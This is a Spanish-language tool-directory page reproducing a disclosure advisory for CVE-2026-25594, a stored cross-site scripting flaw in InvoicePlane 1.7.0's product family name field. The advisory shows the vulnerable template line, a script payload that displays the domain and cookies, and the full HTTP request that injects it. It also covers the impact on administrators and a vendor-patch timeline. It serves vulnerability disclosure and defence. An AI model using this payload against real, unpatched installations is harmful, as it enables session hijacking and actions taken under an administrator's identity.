Skip to content
KitploitKITPLOIT
HerramientasBlog
Log in
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/lagathos/cve-2026-25594
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebAprendizaje y Educación
GitHublagathos/cve-2026-25594

CVE-2026-25594

Prueba de concepto de XSS almacenado para InvoicePlane 1.7.0 a través del campo de apellido, incluyendo payload, solicitud y análisis de impacto para investigación defensiva.

Ver Repositorio
10hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-25594 — XSS Almacenado a través del Nombre de Familia en InvoicePlane 1.7.0

Vulnerabilidad: Cross-Site Scripting (XSS) Almacenado a través del campo Nombre de Familia

Producto: InvoicePlane

Versión afectada: 1.7.0 (y probablemente versiones anteriores)

Gravedad: Media

Puntuación CVSS 3.1: 4.8 (CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N)

CWE: CWE-79: Neutralización incorrecta de la entrada durante la generación de páginas web

Descubierto por: Leonidas Agathos

Fecha del informe: 2026-01-31


Descripción

El campo family_name en el formulario de familias de productos (/index.php/families/form) acepta entrada arbitraria sin saneamiento. El valor se almacena en la base de datos y posteriormente se renderiza sin codificar en el desplegable de familias de la página de creación/edición de productos, lo que provoca la ejecución de JavaScript para cualquier administrador que visite el formulario de productos.

Archivo vulnerable: application/modules/products/views/form.php:40

// Línea 40
><?php echo $family->family_name; ?></option>

Prueba de concepto

Paso 1 — Inyectar el payload en el Nombre de Familia

Navegue a /index.php/families/form y envíe lo siguiente como Nombre de Familia:

<script>alert('domain:'+document.domain+'cookies:'+document.cookie)</script>

Solicitud:

POST /index.php/families/form HTTP/1.1
Host: 172.25.0.12
Content-Type: application/x-www-form-urlencoded

_ip_csrf=...&btn_submit=1&is_update=0&family_name=%3Cscript%3Ealert%28document.cookies%29%3C%2Fscript%3E

Paso 1 - Inyectando el payload XSS en el campo Nombre de Familia mediante Burp Suite

Paso 2 — Activar el XSS

Navegue a /index.php/products/form. El payload se ejecuta cuando se renderiza el desplegable de familias.

Paso 2 - XSS ejecutándose en la página del Formulario de Productos, filtrando dominio y cookies


Impacto

Cualquier administrador que visite la página de creación o edición de productos tendrá el payload ejecutado en su navegador. Esto permite el secuestro de sesión (si las cookies no son HttpOnly), el robo de tokens CSRF y la realización de acciones bajo la identidad de la víctima.


Cronología

FechaEvento
2026-01-30Vulnerabilidad descubierta
2026-01-31Prueba de concepto desarrollada
2026-01-31Proveedor notificado
2026-02-04Reconocimiento del proveedor
2026-02-04Parche publicado
2026-02-05Divulgación pública

Referencias

  • CWE-79
  • OWASP: Cross-Site Scripting (XSS)
  • CVE-2026-25594

Aviso legal

Esta vulnerabilidad fue descubierta durante una investigación de seguridad independiente. Toda la información se proporciona estrictamente con fines educativos, de investigación y defensivos para ayudar al proveedor y a la comunidad de seguridad a comprender y remediar el problema. Cualquier uso malintencionado de esta información está estrictamente prohibido.

Descargar herramienta